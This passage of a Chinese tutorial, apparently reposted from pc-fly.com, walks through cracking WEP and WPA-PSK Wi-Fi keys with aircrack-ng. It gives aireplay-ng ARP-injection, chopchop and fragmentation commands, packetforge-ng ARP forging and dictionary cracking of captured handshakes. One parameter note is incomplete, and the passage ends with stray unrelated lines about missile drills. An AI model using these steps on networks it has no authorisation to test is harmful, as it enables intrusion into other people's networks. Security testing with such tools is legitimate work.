户端那一般需要等几分钟,让合法客户端和ap 之间通信,少量数据就可产生有效ARP request 才可利用-3
模式注入成功。如果没有任何通信存在,不能得到ARP request.,则这种攻击就会失败。如果合法客户端和
ap之间长时间内没有ARP request,可以尝试同时使用-0 攻击。
如果没有合法客户端,则可以利用-1 建立虚拟连接的伪装客户端,连接过程中获得验证数据包,从而产生
有效ARP request。再通过-3模式注入。
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
参数说明:
【-3】:arp注入攻击模式
【-b】:设置ap的mac
【-h】:设置
【-x】:定义每秒发送数据户包的数量,但是最高不超过1024,建议使用512(也可不定义)
-4 Chopchop 攻击模式,用以获得一个包含密钥数据的xor 文件
这种模式主要是获得一个可利用包含密钥数据的xor 文件,不能用来解密数据包。而是用它来产生一个新
的数据包以便我们可以进行注入。
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
参数说明:
-b:设置需要破解的AP的mac
-h:设置虚拟伪装连接的mac(即自己网卡的mac)
-5 fragment碎片包攻击模式 用以获得PRGA(包含密钥的后缀为xor 的文件)
这种模式主要是获得一个可利用PRGA,这里的PRGA 并不是wep key数据,不能用来解密数据包。而是
用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标AP重新广播包,当AP重广播
时,一个新的IVS将产生,我们就是利用这个来破解
aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
【-5】:碎片包攻击模式
【-b】:设置ap的mac
【-h】:设置虚拟伪装连接的mac(即自己网卡的mac)
Packetforge-ng:数据包制造程序
Packetforge-ng <mode> <options>
Mode
【-0】:伪造ARP包
packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 –k 255.255.255.255 -l 255.255.255.255 –y<.xor file> -w mrarp
参数说明:
【-0】:伪装arp数据包 【-a】:设置ap的mac 【-h】设置虚拟伪装连接的mac(即自己的mac) 【-k】<ip[:port]>说明:设置目标文件IP和端口 【-l】<ip[:port]>说明:设置源文件IP和端口 【-y】<file>说明:从xor 文件中读取PRGA。后面跟xor 的文件名。 【-w】设置伪装的arp包的文件名 Aircrack-ng:WEP 及 WPA-PSK key 破解主程序 Aircrack-ng [optin] <.cap/.ivs file> Optin aircrack-ng -n 64 -b <ap mac> name-01.ivs 参数说明: 【-n】:设置WEP KEY 长度(64/128/152/256/512) aircrack-ng -x -f 2 name-01h.cap
参数说明:
【-x】:设置为破解模式
【-f】:设置复杂程度,wep密码设置为1,wpa 密码设置为2
aircrack-ng -w password.txt ciw.cap
【-w】:设置为字典破解模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到WPA 验证的抓包 文件。
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/ruanjian/article-53606-6.html
不过再怎么作死
在12海里进行东风21实弹射击
进入一级战备状态以捍卫国家主权